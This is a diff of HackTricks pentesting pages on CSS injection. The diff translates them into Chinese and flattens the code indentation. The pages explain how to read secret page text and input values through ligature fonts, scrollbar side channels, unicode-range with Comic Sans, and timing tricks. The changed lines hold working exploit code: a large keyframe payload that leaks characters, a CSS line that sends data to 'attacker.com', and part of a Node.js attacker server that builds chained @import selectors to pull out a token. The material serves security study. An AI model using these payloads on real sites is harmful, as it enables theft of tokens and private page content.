-   - CSS is used to ensure that text does not wrap (`white-space: nowrap`) and to customize the scrollbar style.
-   - The appearance of a horizontal scrollbar, styled distinctly, acts as an indicator (oracle) that a specific ligature, and hence a specific character sequence, is present in the text.
-   - The CSS involved:
-     ```css
-     body {
-       white-space: nowrap;
-     }
-     body::-webkit-scrollbar {
-       background: blue;
-     }
-     body::-webkit-scrollbar:horizontal {
-       background: url(http://attacker.com/?leak);
-     }
-     ```
+3. **利用过程**：
 
-3. **Exploit Process**:
+- **步骤 1**：为具有较大宽度的字符对创建字体。
+- **步骤 2**：使用基于滚动条的技巧来检测何时渲染大宽度字形（字符对的连字），指示字符序列的存在。
+- **步骤 3**：在检测到连字后，生成表示三个字符序列的新字形，包含检测到的对并添加前导或后续字符。
+- **步骤 4**：进行三个字符连字的检测。
+- **步骤 5**：该过程重复，逐步揭示整个文本。
 
-   - **Step 1**: Fonts are created for pairs of characters with substantial width.
-   - **Step 2**: A scrollbar-based trick is employed to detect when the large width glyph (ligature for a character pair) is rendered, indicating the presence of the character sequence.
-   - **Step 3**: Upon detecting a ligature, new glyphs representing three-character sequences are generated, incorporating the detected pair and adding a preceding or succeeding character.
-   - **Step 4**: Detection of the three-character ligature is carried out.
-   - **Step 5**: The process repeats, progressively revealing the entire text.
+4. **优化**：
+- 当前使用 `<meta refresh=...` 的初始化方法并不理想。
+- 更有效的方法可能涉及 CSS `@import` 技巧，提高利用的性能。
 
-4. **Optimization**:
-   - The current initialization method using `<meta refresh=...` is not optimal.
-   - A more efficient approach could involve the CSS `@import` trick, enhancing the exploit's performance.
+### 文本节点外泄 (II)：使用默认字体泄露字符集（不需要外部资产） <a href="#text-node-exfiltration-ii-leaking-the-charset-with-a-default-font" id="text-node-exfiltration-ii-leaking-the-charset-with-a-default-font"></a>
 
-### Text node exfiltration (II): leaking the charset with a default font (not requiring external assets) <a href="#text-node-exfiltration-ii-leaking-the-charset-with-a-default-font" id="text-node-exfiltration-ii-leaking-the-charset-with-a-default-font"></a>
+**参考：** [PoC using Comic Sans by @Cgvwzq & @Terjanq](https://demo.vwzq.net/css2.html)
 
-**Reference:** [PoC using Comic Sans by @Cgvwzq & @Terjanq](https://demo.vwzq.net/css2.html)
+这个技巧在这个 [**Slackers 线程**](https://www.reddit.com/r/Slackers/comments/dzrx2s/what_can_we_do_with_single_css_injection/) 中发布。文本节点中使用的字符集可以 **使用浏览器中安装的默认字体** 泄露：不需要外部或自定义字体。
 
-This trick was released in this [**Slackers thread**](https://www.reddit.com/r/Slackers/comments/dzrx2s/what_can_we_do_with_single_css_injection/). The charset used in a text node can be leaked **using the default fonts** installed in the browser: no external -or custom- fonts are needed.
+该概念围绕利用动画逐步扩展 `div` 的宽度，使一个字符一次性从文本的“后缀”部分过渡到“前缀”部分。这个过程有效地将文本分成两个部分：
 
-The concept revolves around utilizing an animation to incrementally expand a `div`'s width, allowing one character at a time to transition from the 'suffix' part of the text to the 'prefix' part. This process effectively splits the text into two sections:
+1. **前缀**：初始行。
+2. **后缀**：后续行。
 
-1. **Prefix**: The initial line.
-2. **Suffix**: The subsequent line(s).
-
-The transition stages of the characters would appear as follows:
+字符的过渡阶段将如下所示：
 
 **C**\
 ADB
@@ -289,491 +273,483 @@ B
 
 **CADB**
 
-During this transition, the **unicode-range trick** is employed to identify each new character as it joins the prefix. This is achieved by switching the font to Comic Sans, which is notably taller than the default font, consequently triggering a vertical scrollbar. This scrollbar's appearance indirectly reveals the presence of a new character in the prefix.
+在此过渡期间，**unicode-range 技巧**被用来识别每个新字符，因为它加入前缀。这是通过将字体切换到 Comic Sans 来实现的，后者明显比默认字体高，从而触发垂直滚动条。这个滚动条的出现间接揭示了前缀中存在新字符。
 
-Although this method allows the detection of unique characters as they appear, it does not specify which character is repeated, only that a repetition has occurred.
+尽管这种方法允许检测到独特字符的出现，但并未指定哪个字符被重复，仅仅表明发生了重复。
 
 > [!NOTE]
-> Basically, the **unicode-range is used to detect a char**, but as we don't want to load an external font, we need to find another way.\
-> When the **char** is **found**, it's **given** the pre-installed **Comic Sans font**, which **makes** the char **bigger** and **triggers a scroll bar** which will **leak the found char**.
-
-Check the code extracted from the PoC:
+> 基本上，**unicode-range 用于检测字符**，但由于我们不想加载外部字体，我们需要找到另一种方法。\
+> 当 **字符** 被 **找到** 时，它被 **赋予** 预安装的 **Comic Sans 字体**，这使得字符 **变大** 并 **触发滚动条**，这将 **泄露找到的字符**。
 
+检查从 PoC 中提取的代码：
 ```css
 /* comic sans is high (lol) and causes a vertical overflow */
 @font-face {
-  font-family: has_A;
-  src: local("Comic Sans MS");
-  unicode-range: U+41;
-  font-style: monospace;
+font-family: has_A;
+src: local("Comic Sans MS");
+unicode-range: U+41;
+font-style: monospace;
 }
 @font-face {
-  font-family: has_B;
-  src: local("Comic Sans MS");
-  unicode-range: U+42;
-  font-style: monospace;
+font-family: has_B;
+src: local("Comic Sans MS");
+unicode-range: U+42;
+font-style: monospace;
 }
 @font-face {
-  font-family: has_C;
-  src: local("Comic Sans MS");
-  unicode-range: U+43;
-  font-style: monospace;
+font-family: has_C;
+src: local("Comic Sans MS");
+unicode-range: U+43;
+font-style: monospace;
 }
 @font-face {
-  font-family: has_D;
-  src: local("Comic Sans MS");
-  unicode-range: U+44;
-  font-style: monospace;
+font-family: has_D;
+src: local("Comic Sans MS");
+unicode-range: U+44;
+font-style: monospace;
 }
 @font-face {
-  font-family: has_E;
-  src: local("Comic Sans MS");
-  unicode-range: U+45;
-  font-style: monospace;
+font-family: has_E;
+src: local("Comic Sans MS");
+unicode-range: U+45;
+font-style: monospace;
 }
 @font-face {
-  font-family: has_F;
-  src: local("Comic Sans MS");
-  unicode-range: U+46;
-  font-style: monospace;
+font-family: has_F;
+src: local("Comic Sans MS");
+unicode-range: U+46;
+font-style: monospace;
 }
 @font-face {
-  font-family: has_G;
-  src: local("Comic Sans MS");
-  unicode-range: U+47;
-  font-style: monospace;
+font-family: has_G;
+src: local("Comic Sans MS");
+unicode-range: U+47;
+font-style: monospace;
 }
 @font-face {
-  font-family: has_H;
-  src: local("Comic Sans MS");
-  unicode-range: U+48;
-  font-style: monospace;
+font-family: has_H;
+src: local("Comic Sans MS");
+unicode-range: U+48;
+font-style: monospace;
 }
 @font-face {
-  font-family: has_I;
-  src: local("Comic Sans MS");
-  unicode-range: U+49;
-  font-style: monospace;
+font-family: has_I;
+src: local("Comic Sans MS");
+unicode-range: U+49;
+font-style: monospace;
 }
 @font-face {
-  font-family: has_J;
-  src: local("Comic Sans MS");
-  unicode-range: U+4a;
-  font-style: monospace;
+font-family: has_J;
+src: local("Comic Sans MS");
+unicode-range: U+4a;
+font-style: monospace;
 }
 @font-face {
-  font-family: has_K;
-  src: local("Comic Sans MS");
-  unicode-range: U+4b;
-  font-style: monospace;
+font-family: has_K;
+src: local("Comic Sans MS");
+unicode-range: U+4b;
+font-style: monospace;
 }
 @font-face {
-  font-family: has_L;
-  src: local("Comic Sans MS");
-  unicode-range: U+4c;
-  font-style: monospace;
+font-family: has_L;
+src: local("Comic Sans MS");
+unicode-range: U+4c;
+font-style: monospace;
 }
 @font-face {
-  font-family: has_M;
-  src: local("Comic Sans MS");
-  unicode-range: U+4d;
-  font-style: monospace;
+font-family: has_M;
+src: local("Comic Sans MS");
+unicode-range: U+4d;
+font-style: monospace;
 }
 @font-face {
-  font-family: has_N;
-  src: local("Comic Sans MS");
-  unicode-range: U+4e;
-  font-style: monospace;
+font-family: has_N;
+src: local("Comic Sans MS");
+unicode-range: U+4e;
+font-style: monospace;
 }
 @font-face {
-  font-family: has_O;
-  src: local("Comic Sans MS");
-  unicode-range: U+4f;
-  font-style: monospace;
+font-family: has_O;
+src: local("Comic Sans MS");
+unicode-range: U+4f;
+font-style: monospace;
 }
 @font-face {
-  font-family: has_P;
-  src: local("Comic Sans MS");
-  unicode-range: U+50;
-  font-style: monospace;
+font-family: has_P;
+src: local("Comic Sans MS");
+unicode-range: U+50;
+font-style: monospace;
 }
 @font-face {
-  font-family: has_Q;
-  src: local("Comic Sans MS");
-  unicode-range: U+51;
-  font-style: monospace;
+font-family: has_Q;
+src: local("Comic Sans MS");
+unicode-range: U+51;
+font-style: monospace;
 }
 @font-face {
-  font-family: has_R;
-  src: local("Comic Sans MS");
-  unicode-range: U+52;
-  font-style: monospace;
+font-family: has_R;
+src: local("Comic Sans MS");
+unicode-range: U+52;
+font-style: monospace;
 }
 @font-face {
-  font-family: has_S;
-  src: local("Comic Sans MS");
-  unicode-range: U+53;
-  font-style: monospace;
+font-family: has_S;
+src: local("Comic Sans MS");
+unicode-range: U+53;
+font-style: monospace;
 }
 @font-face {
-  font-family: has_T;
-  src: local("Comic Sans MS");
-  unicode-range: U+54;
-  font-style: monospace;
+font-family: has_T;
+src: local("Comic Sans MS");
+unicode-range: U+54;
+font-style: monospace;
 }
 @font-face {
-  font-family: has_U;
-  src: local("Comic Sans MS");
-  unicode-range: U+55;
-  font-style: monospace;
+font-family: has_U;
+src: local("Comic Sans MS");
+unicode-range: U+55;
+font-style: monospace;
 }
 @font-face {
-  font-family: has_V;
-  src: local("Comic Sans MS");
-  unicode-range: U+56;
-  font-style: monospace;
+font-family: has_V;
+src: local("Comic Sans MS");
+unicode-range: U+56;
+font-style: monospace;
 }
 @font-face {
-  font-family: has_W;
-  src: local("Comic Sans MS");
-  unicode-range: U+57;
-  font-style: monospace;
+font-family: has_W;
+src: local("Comic Sans MS");
+unicode-range: U+57;
+font-style: monospace;
 }
 @font-face {
-  font-family: has_X;
-  src: local("Comic Sans MS");
-  unicode-range: U+58;
-  font-style: monospace;
+font-family: has_X;
+src: local("Comic Sans MS");
+unicode-range: U+58;
+font-style: monospace;
 }
 @font-face {
-  font-family: has_Y;
-  src: local("Comic Sans MS");
-  unicode-range: U+59;
-  font-style: monospace;
+font-family: has_Y;
+src: local("Comic Sans MS");
+unicode-range: U+59;
+font-style: monospace;
 }
 @font-face {
-  font-family: has_Z;
-  src: local("Comic Sans MS");
-  unicode-range: U+5a;
-  font-style: monospace;
+font-family: has_Z;
+src: local("Comic Sans MS");
+unicode-range: U+5a;
+font-style: monospace;
 }
 @font-face {
-  font-family: has_0;
-  src: local("Comic Sans MS");
-  unicode-range: U+30;
-  font-style: monospace;
+font-family: has_0;
+src: local("Comic Sans MS");
+unicode-range: U+30;
+font-style: monospace;
 }
 @font-face {
-  font-family: has_1;
-  src: local("Comic Sans MS");
-  unicode-range: U+31;
-  font-style: monospace;
+font-family: has_1;
+src: local("Comic Sans MS");
+unicode-range: U+31;
+font-style: monospace;
 }
 @font-face {
-  font-family: has_2;
-  src: local("Comic Sans MS");
-  unicode-range: U+32;
-  font-style: monospace;
+font-family: has_2;
+src: local("Comic Sans MS");
+unicode-range: U+32;
+font-style: monospace;
 }
 @font-face {
-  font-family: has_3;
-  src: local("Comic Sans MS");
-  unicode-range: U+33;
-  font-style: monospace;
+font-family: has_3;
+src: local("Comic Sans MS");
+unicode-range: U+33;
+font-style: monospace;
 }
 @font-face {
-  font-family: has_4;
-  src: local("Comic Sans MS");
-  unicode-range: U+34;
-  font-style: monospace;
+font-family: has_4;
+src: local("Comic Sans MS");
+unicode-range: U+34;
+font-style: monospace;
 }
 @font-face {
-  font-family: has_5;
-  src: local("Comic Sans MS");
-  unicode-range: U+35;
-  font-style: monospace;
+font-family: has_5;
+src: local("Comic Sans MS");
+unicode-range: U+35;
+font-style: monospace;
 }
 @font-face {
-  font-family: has_6;
-  src: local("Comic Sans MS");
-  unicode-range: U+36;
-  font-style: monospace;
+font-family: has_6;
+src: local("Comic Sans MS");
+unicode-range: U+36;
+font-style: monospace;
 }
 @font-face {
-  font-family: has_7;
-  src: local("Comic Sans MS");
-  unicode-range: U+37;
-  font-style: monospace;
+font-family: has_7;
+src: local("Comic Sans MS");
+unicode-range: U+37;
+font-style: monospace;
 }
 @font-face {
-  font-family: has_8;
-  src: local("Comic Sans MS");
-  unicode-range: U+38;
-  font-style: monospace;
+font-family: has_8;
+src: local("Comic Sans MS");
+unicode-range: U+38;
+font-style: monospace;
 }
 @font-face {
-  font-family: has_9;
-  src: local("Comic Sans MS");
-  unicode-range: U+39;
-  font-style: monospace;
+font-family: has_9;
+src: local("Comic Sans MS");
+unicode-range: U+39;
+font-style: monospace;
 }
 @font-face {
-  font-family: rest;
-  src: local("Courier New");
-  font-style: monospace;
-  unicode-range: U+0-10FFFF;
+font-family: rest;
+src: local("Courier New");
+font-style: monospace;
+unicode-range: U+0-10FFFF;
 }
 
 div.leak {
-  overflow-y: auto; /* leak channel */
-  overflow-x: hidden; /* remove false positives */
-  height: 40px; /* comic sans capitals exceed this height */
-  font-size: 0px; /* make suffix invisible */
-  letter-spacing: 0px; /* separation */
-  word-break: break-all; /* small width split words in lines */
-  font-family: rest; /* default */
-  background: grey; /* default */
-  width: 0px; /* initial value */
-  animation: loop step-end 200s 0s, trychar step-end 2s 0s; /* animations: trychar duration must be 1/100th of loop duration */
-  animation-iteration-count: 1, infinite; /* single width iteration, repeat trychar one per width increase (or infinite) */
+overflow-y: auto; /* leak channel */
+overflow-x: hidden; /* remove false positives */
+height: 40px; /* comic sans capitals exceed this height */
+font-size: 0px; /* make suffix invisible */
+letter-spacing: 0px; /* separation */
+word-break: break-all; /* small width split words in lines */
+font-family: rest; /* default */
+background: grey; /* default */
+width: 0px; /* initial value */
+animation: loop step-end 200s 0s, trychar step-end 2s 0s; /* animations: trychar duration must be 1/100th of loop duration */
+animation-iteration-count: 1, infinite; /* single width iteration, repeat trychar one per width increase (or infinite) */
 }
 
 div.leak::first-line {
-  font-size: 30px; /* prefix is visible in first line */
-  text-transform: uppercase; /* only capital letters leak */
+font-size: 30px; /* prefix is visible in first line */
+text-transform: uppercase; /* only capital letters leak */
 }
 
 /* iterate over all chars */
 @keyframes trychar {
-  0% {
-    font-family: rest;
-  } /* delay for width change */
-  5% {
-    font-family: has_A, rest;
-    --leak: url(?a);
-  }
-  6% {
-    font-family: rest;
-  }
-  10% {
-    font-family: has_B, rest;
-    --leak: url(?b);
-  }
-  11% {
-    font-family: rest;
-  }
-  15% {
-    font-family: has_C, rest;
-    --leak: url(?c);
-  }
-  16% {
-    font-family: rest;
-  }
-  20% {
-    font-family: has_D, rest;
-    --leak: url(?d);
-  }
-  21% {
-    font-family: rest;
-  }
-  25% {
-    font-family: has_E, rest;
-    --leak: url(?e);
-  }
-  26% {
-    font-family: rest;
-  }
-  30% {
-    font-family: has_F, rest;
-    --leak: url(?f);
-  }
-  31% {
-    font-family: rest;
-  }
-  35% {
-    font-family: has_G, rest;
-    --leak: url(?g);
-  }
-  36% {
-    font-family: rest;
-  }
-  40% {
-    font-family: has_H, rest;
-    --leak: url(?h);
-  }
-  41% {
-    font-family: rest;
-  }
-  45% {
-    font-family: has_I, rest;
-    --leak: url(?i);
-  }
-  46% {
-    font-family: rest;
-  }
-  50% {
-    font-family: has_J, rest;
-    --leak: url(?j);
-  }
-  51% {
-    font-family: rest;
-  }
-  55% {
-    font-family: has_K, rest;
-    --leak: url(?k);
-  }
-  56% {
-    font-family: rest;
-  }
-  60% {
-    font-family: has_L, rest;
-    --leak: url(?l);
-  }
-  61% {
-    font-family: rest;
-  }
-  65% {
-    font-family: has_M, rest;
-    --leak: url(?m);
-  }
-  66% {
-    font-family: rest;
-  }
-  70% {
-    font-family: has_N, rest;
-    --leak: url(?n);
-  }
-  71% {
-    font-family: rest;
-  }
-  75% {
-    font-family: has_O, rest;
-    --leak: url(?o);
-  }
-  76% {
-    font-family: rest;
-  }
-  80% {
-    font-family: has_P, rest;
-    --leak: url(?p);
-  }
-  81% {
-    font-family: rest;
-  }
-  85% {
-    font-family: has_Q, rest;
-    --leak: url(?q);
-  }
-  86% {
-    font-family: rest;
-  }
-  90% {
-    font-family: has_R, rest;
-    --leak: url(?r);
-  }
-  91% {
-    font-family: rest;
-  }
-  95% {
-    font-family: has_S, rest;
-    --leak: url(?s);
-  }
-  96% {
-    font-family: rest;
-  }
+0% {
+font-family: rest;
+} /* delay for width change */
+5% {
+font-family: has_A, rest;
+--leak: url(?a);
+}
+6% {
+font-family: rest;
+}
+10% {
+font-family: has_B, rest;
+--leak: url(?b);
+}
+11% {
+font-family: rest;
+}
+15% {
+font-family: has_C, rest;
+--leak: url(?c);
+}
+16% {
+font-family: rest;
+}
+20% {
+font-family: has_D, rest;
+--leak: url(?d);
+}
+21% {
+font-family: rest;
+}
+25% {
+font-family: has_E, rest;
+--leak: url(?e);
+}
+26% {
+font-family: rest;
+}
+30% {
+font-family: has_F, rest;
+--leak: url(?f);
+}
+31% {
+font-family: rest;
+}
+35% {
+font-family: has_G, rest;
+--leak: url(?g);
+}
+36% {
+font-family: rest;
+}
+40% {
+font-family: has_H, rest;
+--leak: url(?h);
+}
+41% {
+font-family: rest;
+}
+45% {
+font-family: has_I, rest;
+--leak: url(?i);
+}
+46% {
+font-family: rest;
+}
+50% {
+font-family: has_J, rest;
+--leak: url(?j);
+}
+51% {
+font-family: rest;
+}
+55% {
+font-family: has_K, rest;
+--leak: url(?k);
+}
+56% {
+font-family: rest;
+}
+60% {
+font-family: has_L, rest;
+--leak: url(?l);
+}
+61% {
+font-family: rest;
+}
+65% {
+font-family: has_M, rest;
+--leak: url(?m);
+}
+66% {
+font-family: rest;
+}
+70% {
+font-family: has_N, rest;
+--leak: url(?n);
+}
+71% {
+font-family: rest;
+}
+75% {
+font-family: has_O, rest;
+--leak: url(?o);
+}
+76% {
+font-family: rest;
+}
+80% {
+font-family: has_P, rest;
+--leak: url(?p);
+}
+81% {
+font-family: rest;
+}
+85% {
+font-family: has_Q, rest;
+--leak: url(?q);
+}
+86% {
+font-family: rest;
+}
+90% {
+font-family: has_R, rest;
+--leak: url(?r);
+}
+91% {
+font-family: rest;
+}
+95% {
+font-family: has_S, rest;
+--leak: url(?s);
+}
+96% {
+font-family: rest;
+}
 }
 
 /* increase width char by char, i.e. add new char to prefix */
 @keyframes loop {
-  0% {
-    width: 0px;
-  }
-  1% {
-    width: 20px;
-  }
-  2% {
-    width: 40px;
-  }
-  3% {
-    width: 60px;
-  }
-  4% {
-    width: 80px;
-  }
-  4% {
-    width: 100px;
-  }
-  5% {
-    width: 120px;
-  }
-  6% {
-    width: 140px;
-  }
-  7% {
-    width: 0px;
-  }
+0% {
+width: 0px;
+}
+1% {
+width: 20px;
+}
+2% {
+width: 40px;
+}
+3% {
+width: 60px;
+}
+4% {
+width: 80px;
+}
+4% {
+width: 100px;
+}
+5% {
+width: 120px;
+}
+6% {
+width: 140px;
+}
+7% {
+width: 0px;
+}
 }
 
 div::-webkit-scrollbar {
-  background: blue;
+background: blue;
 }
 
 /* side-channel */
 div::-webkit-scrollbar:vertical {
-  background: blue var(--leak);
+background: blue var(--leak);
 }
 ```
+### 文本节点外泄 (III)：通过隐藏元素泄露字符集，使用默认字体（不需要外部资源） <a href="#text-node-exfiltration-ii-leaking-the-charset-with-a-default-font" id="text-node-exfiltration-ii-leaking-the-charset-with-a-default-font"></a>
 
-### Text node exfiltration (III): leaking the charset with a default font by hiding elements (not requiring external assets) <a href="#text-node-exfiltration-ii-leaking-the-charset-with-a-default-font" id="text-node-exfiltration-ii-leaking-the-charset-with-a-default-font"></a>
+**参考：** 这在[这篇文章中被提到作为一个不成功的解决方案](https://blog.huli.tw/2022/06/14/en/justctf-2022-writeup/#ninja1-solves)
 
-**Reference:** This is mentioned as [an unsuccessful solution in this writeup](https://blog.huli.tw/2022/06/14/en/justctf-2022-writeup/#ninja1-solves)
+这个案例与之前的非常相似，然而，在这个案例中，特定字符比其他字符更大的目标是**隐藏某些东西**，比如一个按钮不被机器人点击，或者一个不会被加载的图像。因此，我们可以测量这个动作（或缺乏动作），并知道特定字符是否存在于文本中。
 
-This case is very similar to the previous one, however, in this case the goal of making specific **chars bigger than other is to hide something** like a button to not be pressed by the bot or a image that won't be loaded. So we could measure the action (or lack of the action) and know if a specific char is present inside the text.
+### 文本节点外泄 (III)：通过缓存时间泄露字符集（不需要外部资源） <a href="#text-node-exfiltration-ii-leaking-the-charset-with-a-default-font" id="text-node-exfiltration-ii-leaking-the-charset-with-a-default-font"></a>
 
-### Text node exfiltration (III): leaking the charset by cache timing (not requiring external assets) <a href="#text-node-exfiltration-ii-leaking-the-charset-with-a-default-font" id="text-node-exfiltration-ii-leaking-the-charset-with-a-default-font"></a>
-
-**Reference:** This is mentioned as [an unsuccessful solution in this writeup](https://blog.huli.tw/2022/06/14/en/justctf-2022-writeup/#ninja1-solves)
-
-In this case, we could try to leak if a char is in the text by loading a fake font from the same origin:
+**参考：** 这在[这篇文章中被提到作为一个不成功的解决方案](https://blog.huli.tw/2022/06/14/en/justctf-2022-writeup/#ninja1-solves)
 
+在这个案例中，我们可以尝试通过从同一来源加载一个假字体来泄露字符是否在文本中：
 ```css
 @font-face {
-  font-family: "A1";
-  src: url(/static/bootstrap.min.css?q=1);
-  unicode-range: U+0041;
+font-family: "A1";
+src: url(/static/bootstrap.min.css?q=1);
+unicode-range: U+0041;
 }
 ```
+如果匹配成功，**字体将从 `/static/bootstrap.min.css?q=1` 加载**。虽然它不会成功加载，但**浏览器应该缓存它**，即使没有缓存，也有**304未修改**机制，因此**响应应该比其他内容更快**。
 
-If there is a match, the **font will be loaded from `/static/bootstrap.min.css?q=1`**. Although it won’t load successfully, the **browser should cache it**, and even if there is no cache, there is a **304 not modified** mechanism, so the **response should be faster** than other things.
+然而，如果缓存响应与非缓存响应的时间差异不够大，这将没有用。例如，作者提到：但是，经过测试，我发现第一个问题是速度没有太大差别，第二个问题是机器人使用了 `disk-cache-size=1` 标志，这真的很周到。
 
-However, if the time difference of the cached response from the non-cached one isn't big enough, this won't be useful. For example, the author mentioned: However, after testing, I found that the first problem is that the speed is not much different, and the second problem is that the bot uses the `disk-cache-size=1` flag, which is really thoughtful.
+### 文本节点外泄 (III)：通过定时加载数百个本地“字体”（不需要外部资源）泄露字符集 <a href="#text-node-exfiltration-ii-leaking-the-charset-with-a-default-font" id="text-node-exfiltration-ii-leaking-the-charset-with-a-default-font"></a>
 
-### Text node exfiltration (III): leaking the charset by timing loading hundreds of local "fonts" (not requiring external assets) <a href="#text-node-exfiltration-ii-leaking-the-charset-with-a-default-font" id="text-node-exfiltration-ii-leaking-the-charset-with-a-default-font"></a>
-
-**Reference:** This is mentioned as [an unsuccessful solution in this writeup](https://blog.huli.tw/2022/06/14/en/justctf-2022-writeup/#ninja1-solves)
-
-In this case you can indicate **CSS to load hundreds of fake fonts** from the same origin when a match occurs. This way you can **measure the time** it takes and find out if a char appears or not with something like:
+**参考：** 这在[这篇文章中被提到作为一个不成功的解决方案](https://blog.huli.tw/2022/06/14/en/justctf-2022-writeup/#ninja1-solves)
 
+在这种情况下，当发生匹配时，您可以指示**CSS从同一来源加载数百个假字体**。这样，您可以**测量所需的时间**，并找出某个字符是否出现，方法是：
 ```css
 @font-face {
-  font-family: "A1";
-  src: url(/static/bootstrap.min.css?q=1), url(/static/bootstrap.min.css?q=2),
-    .... url(/static/bootstrap.min.css?q=500);
-  unicode-range: U+0041;
+font-family: "A1";
+src: url(/static/bootstrap.min.css?q=1), url(/static/bootstrap.min.css?q=2),
+.... url(/static/bootstrap.min.css?q=500);
+unicode-range: U+0041;
 }
 ```
-
-And the bot’s code looks like this:
-
+机器人的代码如下：
 ```python
 browser.get(url)
 WebDriverWait(browser, 30).until(lambda r: r.execute_script('return document.readyState') == 'complete')
 time.sleep(30)
 ```
+所以，如果字体不匹配，访问机器人时的响应时间预计为大约 30 秒。然而，如果字体匹配，将会发送多个请求以检索字体，导致网络持续活动。因此，满足停止条件并接收响应所需的时间会更长。因此，响应时间可以用作判断是否存在字体匹配的指标。
 
-So, if the font does not match, the response time when visiting the bot is expected to be approximately 30 seconds. However, if there is a font match, multiple requests will be sent to retrieve the font, causing the network to have continuous activity. As a result, it will take longer to satisfy the stop condition and receive the response. Therefore, the response time can be used as an indicator to determine if there is a font match.
-
-## References
+## 参考文献
 
 - [https://gist.github.com/jorgectf/993d02bdadb5313f48cf1dc92a7af87e](https://gist.github.com/jorgectf/993d02bdadb5313f48cf1dc92a7af87e)
 - [https://d0nut.medium.com/better-exfiltration-via-html-injection-31c72a2dae8b](https://d0nut.medium.com/better-exfiltration-via-html-injection-31c72a2dae8b)
@@ -781,4 +757,3 @@ So, if the font does not match, the response time when visiting the bot is expec
 - [https://x-c3ll.github.io/posts/CSS-Injection-Primitives/](https://x-c3ll.github.io/posts/CSS-Injection-Primitives/)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/xs-search/css-injection/css-injection-code.md b/src/pentesting-web/xs-search/css-injection/css-injection-code.md
index 0be473785..70e6b21b3 100644
--- a/src/pentesting-web/xs-search/css-injection/css-injection-code.md
+++ b/src/pentesting-web/xs-search/css-injection/css-injection-code.md
@@ -1,31 +1,30 @@
-# CSS Injection Code
+# CSS 注入代码
 
 {{#include ../../../banners/hacktricks-training.md}}
-
 ```html:victim.html
 <!DOCTYPE html>
 <body>
-  <div>
-    <article>
-      <div>
-        <p></p>
-        <div>
-          <div>
-            <div>
-              <div>
-                <div>
-                  <input type="text" value="1234567890" />
-                  <style>
-                    @import url("//localhost:5001/start?");
-                  </style>
-                </div>
-              </div>
-            </div>
-          </div>
-        </div>
-      </div>
-    </article>
-  </div>
+<div>
+<article>
+<div>
+<p></p>
+<div>
+<div>
+<div>
+<div>
+<div>
+<input type="text" value="1234567890" />
+<style>
+@import url("//localhost:5001/start?");
+</style>
+</div>
+</div>
+</div>
+</div>
+</div>
+</div>
+</article>
+</div>
 </body>
 ```
 
@@ -40,152 +39,152 @@ const HOSTNAME = "http://localhost:5001"
 const DEBUG = false
 
 var prefix = "",
-  postfix = ""
+postfix = ""
 var pending = []
 var stop = false,
-  ready = 0,
-  n = 0
+ready = 0,
+n = 0
 
 const requestHandler = (request, response) => {
-  let req = url.parse(request.url, url)
-  log("\treq: %s", request.url)
+let req = url.parse(request.url, url)
+log("\treq: %s", request.url)
 
-  //If stop, leakeage is finished
-  if (stop) return response.end()
+//If stop, leakeage is finished
+if (stop) return response.end()
 
-  switch (req.pathname) {
-    // This only launched when starting the leakeage
-    case "/start":
-      genResponse(response)
-      break
+switch (req.pathname) {
+// This only launched when starting the leakeage
+case "/start":
+genResponse(response)
+break
 
-    // Everytime something is leaked
-    case "/leak":
-      response.end()
-      // If response comes with a pre, then we leaked some preffix s(E)cret
-      if (req.query.pre && prefix !== req.query.pre) {
-        prefix = req.query.pre
+// Everytime something is leaked
+case "/leak":
+response.end()
+// If response comes with a pre, then we leaked some preffix s(E)cret
+if (req.query.pre && prefix !== req.query.pre) {
+prefix = req.query.pre
 
-        // If response comes with a post, then we leaked some suffix secre(T)
-      } else if (req.query.post && postfix !== req.query.post) {
-        postfix = req.query.post
-      } else {
-        break
-      }
+// If response comes with a post, then we leaked some suffix secre(T)
+} else if (req.query.post && postfix !== req.query.post) {
+postfix = req.query.post
+} else {
+break
+}
 
-      // Always a pre and a post response must arrived before responding the "next" @import (which is waiting for response)
-      if (ready == 2) {
-        genResponse(pending.shift())
-        ready = 0
-      } else {
-        ready++
-        log("\tleak: waiting others...")
-      }
-      break
+// Always a pre and a post response must arrived before responding the "next" @import (which is waiting for response)
+if (ready == 2) {
+genResponse(pending.shift())
+ready = 0
+} else {
+ready++
+log("\tleak: waiting others...")
+}
+break
 
-    // While waiting for a pre and a post, the next @import is waiting to be responded
-    // by a new generated payload with another "pre" and "post"
-    case "/next":
-      if (ready == 2) {
-        genResponse(respose)
-        ready = 0
-      } else {
-        pending.push(response)
-        ready++
-        log("\tquery: waiting others...")
-      }
-      break
+// While waiting for a pre and a post, the next @import is waiting to be responded
+// by a new generated payload with another "pre" and "post"
+case "/next":
+if (ready == 2) {
+genResponse(respose)
+ready = 0
+} else {
+pending.push(response)
+ready++
+log("\tquery: waiting others...")
+}
+break
 
-    // Called when the secret is leaked
-    case "/end":
-      stop = true
-      console.log("[+] END: %s", req.query.token)
+// Called when the secret is leaked
+case "/end":
+stop = true
+console.log("[+] END: %s", req.query.token)
 
-    default:
-      response.end()
-  }
+default:
+response.end()
+}
 }
 
 const genResponse = (response) => {
-  // Verbose output to know what do we know
-  console.log("...pre-payoad: " + prefix)
-  console.log("...post-payoad: " + postfix)
+// Verbose output to know what do we know
+console.log("...pre-payoad: " + prefix)
+console.log("...post-payoad: " + postfix)
 
-  // Payload generation, you have an example of what is generated below
-  let css =
-    "@import url(" +
-    HOSTNAME +
-    "/next?" +
-    Math.random() +
-    ");\n" +
-    [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, "a", "b", "c", "d", "e", "f"]
-      .map(
-        (e) =>
-          'input[value$="' +
-          e +
-          postfix +
-          '"]{--e' +
-          n +
-          ":url(" +
-          HOSTNAME +
-          "/leak?post=" +
-          e +
-          postfix +
-          ")}"
-      )
-      .join("") +
-    "div ".repeat(n) +
-    "input{background:var(--e" +
-    n +
-    ")}" +
-    [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, "a", "b", "c", "d", "e", "f"]
-      .map(
-        (e) =>
-          'input[value^="' +
-          prefix +
-          e +
-          '"]{--s' +
-          n +
-          ":url(" +
-          HOSTNAME +
-          "/leak?pre=" +
-          prefix +
-          e +
-          ")}"
-      )
-      .join("") +
-    "div ".repeat(n) +
-    "input{border-image:var(--s" +
-    n +
-    ")}" +
-    "input[value=" +
-    prefix +
-    postfix +
-    "]{list-style:url(" +
-    HOSTNAME +
-    "/end?token=" +
-    prefix +
-    postfix +
-    "&)};"
+// Payload generation, you have an example of what is generated below
+let css =
+"@import url(" +
+HOSTNAME +
+"/next?" +
+Math.random() +
+");\n" +
